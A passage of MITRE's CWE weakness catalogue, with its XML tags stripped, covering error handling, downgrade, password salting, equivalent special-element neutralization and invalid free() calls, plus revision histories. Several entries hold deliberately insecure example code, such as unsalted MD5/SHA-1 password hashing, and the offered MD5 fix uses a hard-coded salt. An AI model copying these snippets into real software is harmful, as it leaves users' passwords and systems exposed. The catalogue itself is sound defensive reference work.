expiration of resources, values passed by reference, asynchronously modified data, sockets, etc. may indicate exceptional conditions without the use of a return value. + + + + CWE Content Team + MITRE + 2009-03-03 + 1.3 + 2009-03-10 + New entry for reorganization of CWE-703. + + + CWE Content Team + MITRE + 2009-07-27 + updated Relationships + + + CWE Content Team + MITRE + 2009-12-28 + updated Applicable_Platforms, Likelihood_of_Exploit, Time_of_Introduction + + + CWE Content Team + MITRE + 2010-02-16 + updated Background_Details, Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Name, Observed_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationship_Notes, Relationships + + + CWE Content Team + MITRE + 2010-04-05 + updated Demonstrative_Examples, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-06-21 + updated Common_Consequences, Detection_Factors, Potential_Mitigations, References + + + CWE Content Team + MITRE + 2010-09-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-12-13 + updated Relationship_Notes + + + CWE Content Team + MITRE + 2011-03-29 + updated Description, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Description, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2020-12-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + "Mapping CWE to 62443" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-04-25 + Suggested mappings to ISA/IEC 62443. + + Improper Check for Exceptional Conditions + + + + The product does not handle or incorrectly handles an exceptional condition. + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Medium + + + Other + Other + + + + + CVE-2021-3011 + virtual interrupt controller in a virtualization product allows crash of host by writing a certain invalid value to a register, which triggers a fatal error instead of returning an error code + https://www.cve.org/CVERecord?id=CVE-2021-3011 + + + CVE-2008-4302 + Chain: OS kernel does not properly handle a failure of a function call (CWE-755), leading to an unlock of a resource that was not locked (CWE-832), with resultant crash. + https://www.cve.org/CVERecord?id=CVE-2008-4302 + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Content Team + MITRE + 2009-03-03 + 1.3 + 2009-03-10 + New entry for reorganization of CWE-703. + + + CWE Content Team + MITRE + 2009-12-28 + updated Applicable_Platforms, Likelihood_of_Exploit, Time_of_Introduction + + + CWE Content Team + MITRE + 2010-12-13 + updated Description, Observed_Examples + + + CWE Content Team + MITRE + 2011-03-29 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Likelihood_of_Exploit, Modes_of_Introduction, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Observed_Examples + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + + + The product does not return custom error pages to the user, possibly exposing sensitive information. + + + + + + + Confidentiality + Read Application Data + Attackers can leverage the additional information provided by a default error page to mount attacks targeted on the framework, database, or other resources used by the application. + + + + + In the snippet below, an unchecked runtime exception thrown from within the try block may cause the container to display its default error page (which may contain a full stack trace, among other things). + + Public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {try {...} catch (ApplicationSpecificException ase) {logger.error("Caught: " + ase.toString());}} + + + + The mode attribute of the <customErrors> tag in the Web.config file defines whether custom or default error pages are used. + In the following insecure ASP.NET application setting, custom error message mode is turned off. An ASP.NET error message with detailed stack trace and platform versions will be returned. + + <customErrors mode="Off" /> + + A more secure setting is to set the custom error message mode for remote users only. No defaultRedirect error page is specified. The local user on the web server will see a detailed stack trace. For remote users, an ASP.NET error message with the server customError configuration setting and the platform version will be returned. + + <customErrors mode="RemoteOnly" /> + + Another secure option is to set the mode attribute of the <customErrors> tag to use a custom page as follows: + + <customErrors mode="On" defaultRedirect="YourErrorPage.htm" /> + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2009-03-03 + 1.3 + 2009-03-10 + New entry for reorganization of CWE-703. + + + CWE Content Team + MITRE + 2010-09-27 + updated Description + + + CWE Content Team + MITRE + 2010-12-13 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships, Type + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + A protocol or its implementation supports interaction between multiple actors and allows those actors to negotiate which algorithm should be used as a protection mechanism such as encryption or authentication, but it does not select the strongest algorithm that is available to both parties. + When a security mechanism can be forced to downgrade to use a less secure algorithm, this can make it easier for attackers to compromise the product by exploiting weaker algorithm. The victim might not be aware that the less secure algorithm is being used. For example, if an attacker can force a communications channel to use cleartext instead of strongly-encrypted data, then the attacker could read the channel by sniffing, instead of going through extra effort of trying to decrypt the data using brute force techniques. + + + + + + Architecture and Design + COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. + + + + + Access Control + Bypass Protection Mechanism + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + CVE-2006-4302 + Attacker can select an older version of the software to exploit its vulnerabilities. + https://www.cve.org/CVERecord?id=CVE-2006-4302 + + + CVE-2006-4407 + Improper prioritization of encryption ciphers during negotiation leads to use of a weaker cipher. + https://www.cve.org/CVERecord?id=CVE-2006-4407 + + + CVE-2005-2969 + chain: SSL/TLS implementation disables a verification step (CWE-325) that enables a downgrade attack to a weaker protocol. + https://www.cve.org/CVERecord?id=CVE-2005-2969 + + + CVE-2001-1444 + Telnet protocol implementation allows downgrade to weaker authentication and encryption using an Adversary-in-the-Middle AITM attack. + https://www.cve.org/CVERecord?id=CVE-2001-1444 + + + CVE-2002-1646 + SSH server implementation allows override of configuration setting to use weaker authentication schemes. This may be a composite with CWE-642. + https://www.cve.org/CVERecord?id=CVE-2002-1646 + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This is related to CWE-300, although not all downgrade attacks necessarily require an entity that redirects or interferes with the network. See examples. + + + + CWE Content Team + MITRE + 2009-03-03 + 1.3 + 2009-03-10 + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Observed_Examples, Relationship_Notes, Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Observed_Examples + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses an API function, data structure, or other entity in a way that relies on properties that are not always guaranteed to hold for that entity. + This can lead to resultant weaknesses when the required properties change, such as when the product is ported to a different platform or if an interaction error (CWE-435) occurs. + + + + + + Indirect + + + Primary + + + + + Other + Other + + + + + Fuzzing + Fuzz testing (fuzzing) is a powerful technique for generating large numbers of diverse inputs - either randomly or algorithmically - and dynamically invoking the code with those inputs. Even with random inputs, it is often capable of generating unexpected results such as crashes, memory corruption, or resource consumption. Fuzzing effectively produces repeatable test cases that clearly indicate bugs, which helps developers to diagnose the issues. + High + + + + + CVE-2006-1902 + Change in C compiler behavior causes resultant buffer overflows in programs that depend on behaviors that were undefined in the C standard. + https://www.cve.org/CVERecord?id=CVE-2006-1902 + + + + + ARR32-C + Ensure size arguments for variable length arrays are in a valid range + CWE More Abstract + + + ERR34-C + Detect errors when converting a string to a number + Imprecise + + + EXP30-C + Do not depend on the order of evaluation for side effects + CWE More Abstract + + + EXP33-C + Do not read uninitialized memory + CWE More Abstract + + + FIO46-C + Do not access a closed file + CWE More Abstract + + + INT34-C + Do not shift an expression by a negative number of bits or by greater than or equal to the number of bits that exist in the operand + CWE More Abstract + + + INT36-C + Converting a pointer to integer or integer to pointer + CWE More Abstract + + + MEM30-C + Do not access freed memory + CWE More Abstract + + + MSC14-C + Do not introduce unnecessary platform dependencies + + + MSC15-C + Do not depend on undefined behavior + + + MSC37-C + Ensure that control never reaches the end of a non-void function + CWE More Abstract + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Content Team + MITRE + 2009-03-03 + 1.3 + 2009-03-10 + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses a one-way cryptographic hash against an input that should not be reversible, such as a password, but the product does not also use a salt as part of the input. + + This makes it easier for attackers to pre-compute the hash value using dictionary attack techniques such as rainbow tables. + It should be noted that, despite common perceptions, the use of a good salt with a hash does not sufficiently increase the effort for an attacker who is targeting an individual password, or who has a large amount of computing resources available, such as with cloud-based services or specialized, inexpensive hardware. Offline password cracking can still be effective if the hash function is not expensive to compute; many cryptographic functions are designed to be efficient and can be vulnerable to attacks using massive computing resources, even if the hash is cryptographically strong. The use of a salt only slightly increases the computing requirements for an attacker compared to other strategies such as adaptive hash functions. See CWE-916 for more details. + + + + + + In cryptography, salt refers to some random addition of data to an input before hashing to make dictionary attacks more difficult. + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Access Control + Bypass Protection Mechanism + Gain Privileges or Assume Identity + If an attacker can gain access to the hashes, then the lack of a salt makes it easier to conduct brute force attacks using techniques such as rainbow tables. + + + + + Automated Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Bytecode Weakness Analysis - including disassembler + source code weakness analysis + Binary Weakness Analysis - including disassembler + source code weakness analysis + + + + SOAR Partial + + + Manual Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies + + + + SOAR Partial + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Focused Manual Spotcheck - Focused manual analysis of source + Manual Source Code Review (not inspections) + + + + High + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + + + High + + + Automated Static Analysis + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Configuration Checker + + + + SOAR Partial + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Formal Methods / Correct-By-Construction + + Cost effective for partial coverage: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + + + + High + + + + + Architecture and Design + + Use an adaptive hash function that can be configured to change the amount of computational effort needed to compute the hash, such as the number of iterations ("stretching") or the amount of memory required. Some hash functions perform salting automatically. These functions can significantly increase the overhead for a brute force attack compared to intentionally-fast functions such as MD5. For example, rainbow table attacks can become infeasible due to the high computing overhead. Finally, since computing power gets faster and cheaper over time, the technique can be reconfigured to increase the workload without forcing an entire replacement of the algorithm in use. + Some hash functions that have one or more of these desired properties include bcrypt [REF-291], scrypt [REF-292], and PBKDF2 [REF-293]. While there is active debate about which of these is the most effective, they are all stronger than using salts with hash functions with very little computing overhead. + Note that using these functions can have an impact on performance, so they require special consideration to avoid denial-of-service attacks. However, their configurability provides finer control over how much CPU and memory is used, so it could be adjusted to suit the environment's needs. + + High + + + Architecture and Design + If a technique that requires extra computational effort can not be implemented, then for each password that is processed, generate a new random salt using a strong random number generator with unpredictable seeds. Add the salt to the plaintext password before hashing it. When storing the hash, also store the salt. Do not use the same salt for every password. + Limited + Be aware that salts will not reduce the workload of a targeted attack against an individual hash (such as the password for a critical person), and in general they are less effective than other hashing techniques such as increasing the computation time or memory overhead. Without a built-in workload, modern attacks can compute large numbers of hashes, or even exhaust the entire space of all possible passwords, within a very short amount of time, using massively-parallel computing and GPU, ASIC, or FPGA hardware. + + + Implementation + Architecture and Design + When using industry-approved techniques, use them correctly. Don't cut corners by skipping resource-intensive steps (CWE-325). These steps are often essential for preventing common attacks. + + + + + In both of these examples, a user is logged in if their given password matches a stored password: + + unsigned char *check_passwd(char *plaintext) {ctext = simple_digest("sha1",plaintext,strlen(plaintext), ... ); + //Login if hash matches stored hash + if (equal(ctext, secret_password())) {login_user();}} + + + String plainText = new String(plainTextIn);MessageDigest encer = MessageDigest.getInstance("SHA");encer.update(plainTextIn);byte[] digest = password.digest(); + //Login if hash matches stored hash + if (equal(digest,secret_password())) {login_user();} + + This code relies exclusively on a password mechanism (CWE-309) using only one factor of authentication (CWE-308). If an attacker can steal or guess a user's password, they are given full access to their account. Note this code also uses SHA-1, which is a weak hash (CWE-328). It also does not use a salt (CWE-759). + + + In this example, a new user provides a new username and password to create an account. The program hashes the new user's password then stores it in a database. + + def storePassword(userName,Password):hasher = hashlib.new('md5')hasher.update(Password)hashedPassword = hasher.digest() + + # UpdateUserLogin returns True on success, False otherwise + return updateUserLogin(userName,hashedPassword) + + + While it is good to avoid storing a cleartext password, the program does not provide a salt to the hashing function, thus increasing the chances of an attacker being able to reverse the hash and discover the original password if the database is compromised. + Fixing this is as simple as providing a salt to the hashing function on initialization: + + def storePassword(userName,Password):hasher = hashlib.new('md5',b'SaltGoesHere')hasher.update(Password)hashedPassword = hasher.digest() + + # UpdateUserLogin returns True on success, False otherwise + return updateUserLogin(userName,hashedPassword) + + + Note that regardless of the usage of a salt, the md5 hash is no longer considered secure, so this example still exhibits CWE-327. + + + + + CVE-2008-1526 + Router does not use a salt with a hash, making it easier to crack passwords. + https://www.cve.org/CVERecord?id=CVE-2008-1526 + + + CVE-2006-1058 + Router does not use a salt with a hash, making it easier to crack passwords. + https://www.cve.org/CVERecord?id=CVE-2006-1058 + + + + + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2009-03-03 + 1.3 + 2009-03-10 + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships + + + CWE Content Team + MITRE + 2010-02-16 + updated References + + + CWE Content Team + MITRE + 2011-03-29 + updated Observed_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences, Demonstrative_Examples, Potential_Mitigations, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples, Potential_Mitigations, References + + + CWE Content Team + MITRE + 2013-02-21 + updated Description, Potential_Mitigations, References, Relationships, Type + + + CWE Content Team + MITRE + 2014-02-18 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2019-06-20 + updated Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product correctly neutralizes certain special elements, but it improperly neutralizes equivalent special elements. + The product may have a fixed list of special characters it believes is complete. However, there may be alternate encodings, or representations that also have the same meaning. For example, the product may filter out a leading slash (/) to prevent absolute path names, but does not account for a tilde (~) followed by a user name, which on some *nix systems could be expanded to an absolute pathname. Alternately, the product might filter a dangerous "-e" command-line switch when calling an external program, but it might not account for "--exec" or other switches that have the same semantics. + + + + + + Primary + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + High + + + Other + Other + + + + + Requirements + Programming languages and supporting technologies might be chosen which are not subject to these issues. + + + Implementation + Utilize an appropriate mix of allowlist and denylist parsing to filter equivalent special element syntax from all input. + + + + + Equivalent Special Element Injection + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-10-29 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2010-06-21 + updated Description, Name + + + CWE Content Team + MITRE + 2010-12-13 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Equivalent Special Element Injection + Failure to Resolve Equivalent Special Elements into a Different Plane + + + + The product uses a one-way cryptographic hash against an input that should not be reversible, such as a password, but the product uses a predictable salt as part of the input. + + This makes it easier for attackers to pre-compute the hash value using dictionary attack techniques such as rainbow tables, effectively disabling the protection that an unpredictable salt would provide. + It should be noted that, despite common perceptions, the use of a good salt with a hash does not sufficiently increase the effort for an attacker who is targeting an individual password, or who has a large amount of computing resources available, such as with cloud-based services or specialized, inexpensive hardware. Offline password cracking can still be effective if the hash function is not expensive to compute; many cryptographic functions are designed to be efficient and can be vulnerable to attacks using massive computing resources, even if the hash is cryptographically strong. The use of a salt only slightly increases the computing requirements for an attacker compared to other strategies such as adaptive hash functions. See CWE-916 for more details. + + + + + + In cryptography, salt refers to some random addition of data to an input before hashing to make dictionary attacks more difficult. + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Access Control + Bypass Protection Mechanism + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + + Use an adaptive hash function that can be configured to change the amount of computational effort needed to compute the hash, such as the number of iterations ("stretching") or the amount of memory required. Some hash functions perform salting automatically. These functions can significantly increase the overhead for a brute force attack compared to intentionally-fast functions such as MD5. For example, rainbow table attacks can become infeasible due to the high computing overhead. Finally, since computing power gets faster and cheaper over time, the technique can be reconfigured to increase the workload without forcing an entire replacement of the algorithm in use. + Some hash functions that have one or more of these desired properties include bcrypt [REF-291], scrypt [REF-292], and PBKDF2 [REF-293]. While there is active debate about which of these is the most effective, they are all stronger than using salts with hash functions with very little computing overhead. + Note that using these functions can have an impact on performance, so they require special consideration to avoid denial-of-service attacks. However, their configurability provides finer control over how much CPU and memory is used, so it could be adjusted to suit the environment's needs. + + High + + + Implementation + If a technique that requires extra computational effort can not be implemented, then for each password that is processed, generate a new random salt using a strong random number generator with unpredictable seeds. Add the salt to the plaintext password before hashing it. When storing the hash, also store the salt. Do not use the same salt for every password. + Limited + Be aware that salts will not reduce the workload of a targeted attack against an individual hash (such as the password for a critical person), and in general they are less effective than other hashing techniques such as increasing the computation time or memory overhead. Without a built-in workload, modern attacks can compute large numbers of hashes, or even exhaust the entire space of all possible passwords, within a very short amount of time, using massively-parallel computing and GPU, ASIC, or FPGA hardware. + + + + + CVE-2008-4905 + Blogging software uses a hard-coded salt when calculating a password hash. + https://www.cve.org/CVERecord?id=CVE-2008-4905 + + + CVE-2002-1657 + Database server uses the username for a salt when encrypting passwords, simplifying brute force attacks. + https://www.cve.org/CVERecord?id=CVE-2002-1657 + + + CVE-2001-0967 + Server uses a constant salt when encrypting passwords, simplifying brute force attacks. + https://www.cve.org/CVERecord?id=CVE-2001-0967 + + + CVE-2005-0408 + chain: product generates predictable MD5 hashes using a constant value combined with username, allowing authentication bypass. + https://www.cve.org/CVERecord?id=CVE-2005-0408 + + + + + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + As of CWE 4.5, terminology related to randomness, entropy, and + predictability can vary widely. Within the developer and other + communities, "randomness" is used heavily. However, within + cryptography, "entropy" is distinct, typically implied as a + measurement. There are no commonly-used definitions, even within + standards documents and cryptography papers. Future versions of + CWE will attempt to define these terms and, if necessary, + distinguish between them in ways that are appropriate for + different communities but do not reduce the usability of CWE for + mapping, understanding, or other scenarios. + + + + CWE Content Team + MITRE + 2009-03-03 + 1.3 + 2009-03-10 + + + CWE Content Team + MITRE + 2009-10-29 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2010-02-16 + updated References + + + CWE Content Team + MITRE + 2011-03-29 + updated Observed_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2013-02-21 + updated Description, Potential_Mitigations, References, Relationships, Type + + + CWE Content Team + MITRE + 2014-02-18 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2019-06-20 + updated Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product calls free() on a pointer to a memory resource that was allocated on the heap, but the pointer is not at the start of the buffer. + + This can cause the product to crash, or in some cases, modify critical program variables or execute code. + This weakness often occurs when the memory is allocated explicitly on the heap with one of the malloc() family functions and free() is called, but pointer arithmetic has caused the pointer to be in the interior or end of the buffer. + + + + + + + + Implementation + + + + + Integrity + Availability + Confidentiality + Modify Memory + DoS: Crash, Exit, or Restart + Execute Unauthorized Code or Commands + + + + + Implementation + When utilizing pointer arithmetic to traverse a buffer, use a separate variable to track progress through memory and preserve the originally allocated address for later freeing. + + + Implementation + When programming in C++, consider using smart pointers provided by the boost library to help correctly and consistently manage memory. + + + Architecture and Design + Libraries or Frameworks + + Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + For example, glibc in Linux provides protection against free of invalid pointers. + + + + Architecture and Design + Use a language that provides abstractions for memory allocation and deallocation. + + + Testing + Use a tool that dynamically detects memory management problems, such as valgrind. + + + + + In this example, the programmer dynamically allocates a buffer to hold a string and then searches for a specific character. After completing the search, the programmer attempts to release the allocated memory and return SUCCESS or FAILURE to the caller. Note: for simplification, this example uses a hard-coded "Search Me!" string and a constant string length of 20. + + #define SUCCESS (1)#define FAILURE (0) + int contains_char(char c){ + char *str;str = (char*)malloc(20*sizeof(char));strcpy(str, "Search Me!");while( *str != NULL){ + if( *str == c ){ + + + /* matched char, free string and return success */ + free(str);return SUCCESS; + } + /* didn't match yet, increment pointer and try next char */ + + str = str + 1; + } + /* we did not match the char in the string, free mem and return failure */ + + free(str);return FAILURE; + } + + However, if the character is not at the beginning of the string, or if it is not in the string at all, then the pointer will not be at the start of the buffer when the programmer frees it. + Instead of freeing the pointer in the middle of the buffer, the programmer can use an indexing pointer to step through the memory or abstract the memory calculations by using array indexing. + + #define SUCCESS (1)#define FAILURE (0) + int cointains_char(char c){ + char *str;int i = 0;str = (char*)malloc(20*sizeof(char));strcpy(str, "Search Me!");while( i < strlen(str) ){ + if( str[i] == c ){ + + + /* matched char, free string and return success */ + free(str);return SUCCESS; + } + /* didn't match yet, increment pointer and try next char */ + + i = i + 1; + } + /* we did not match the char in the string, free mem and return failure */ + + free(str);return FAILURE; + } + + + + This code attempts to tokenize a string and place it into an array using the strsep function, which inserts a \0 byte in place of whitespace or a tab character. After finishing the loop, each string in the AP array points to a location within the input string. + + char **ap, *argv[10], *inputstring;for (ap = argv; (*ap = strsep(&inputstring, " \t")) != NULL;) + 